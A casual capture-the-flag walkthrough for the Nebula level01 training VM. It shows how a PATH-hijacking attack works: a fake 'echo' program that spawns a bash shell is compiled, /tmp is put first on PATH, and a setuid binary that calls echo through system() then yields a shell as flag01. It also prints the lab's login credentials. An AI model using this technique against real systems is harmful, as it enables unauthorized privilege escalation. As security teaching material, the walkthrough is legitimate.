Hello there, so you’ve come for more of these ha !

Lets login to the nebula01 using the following credentials

username: level01

password: level01

let’s move into the diectory where the flag is located. You can perform a locate command to figure that out if you aren’t aware of its location.

# locate flag01

# cd /home/flag01

# ls -la

so we do have the location of the flag. Lets try to execute the flag01 to see what happens .. now what ?

# ./flag01

It just “says and now what ?”

executing the flag01, dose not give us permission to trigger the getflag command after all. Lets try to run an ltrace command on the flag and see what its upto. We also do have the source code of the flag01 in out challenge instructions.

# ltrace ./flag01

Comparing our ltrace output to the source code from exploit education http://exploit.education/nebula/level-01/ , we can see that there is a system call that uses the function “echo” that prints “now what ?”

now, this echo command runs as the user flag01, since its a system call. Inorder to understand this we need to understand about environment variables and PATH.

So what i am gonna do is that, ill try to make the “flag01” executable from any path in the system.

Lets take a look at “/usr/bin/env” which is listed in the source code.

# /usr/bin/env

now you can see the PATH here .. you can also read the path by runnung the following command.

# echo $PATH

so, the echo command is fetched from this path. In order to make our flag accessable from anywhere in the system, we need to add the path of the flag01 to the above. Lets try doing that ..

# export PATH=/home/flag01:$PATH

we can now check the new path and try executing flag01 from different places in the file system.

# echo $PATH

# flag01

# cd /tmp

# flag01

Good, now that we have understood how this works, we would be able to take advantage of the source code. If you carefully notice there is a system call in the source code that executes “echo” command.

This “echo” command is called from the given path, so if we modify the path to something else and create a fake “echo” program which allows us to spawn a bash shell we would be able to escalate privilege. Lets try doing that.

# cd /tmp

# nano echo.c

writing a system call function :

int main ()

{

system(“/bin/bash”);

}

save the file as echo.c, now since this is a C program we need to compile it inorder to run the file.

# gcc -o echo echo.c

# ls -la

# ./echo

we have now conformed that our fake echo program works, you can see that it spawns a bash shell when executed. Let’s try to make this echo program to be executed anywhere in the system, just like how we did it with the flag01.

# export PATH=/tmp:$PATH

# echo $PATH

 since, we made this work .. we can execure both flag01 and echo from any path in the file system. Now we already know that the flag01 when executed calls the echo command, when that happens since “/tmp” is the PATH set to call echo first, its gonna call the “fake echo” that we created which would spawn a bash shell as the user “flag01”

lets try doing that

# cd

# flag01

we win ..

you can see that the shell has switched from, lavel01 –> flag01. now lets execute the getflag command to own the challenge.

 # getflag

Thats it ! See you in the next one –> follow the white rabbit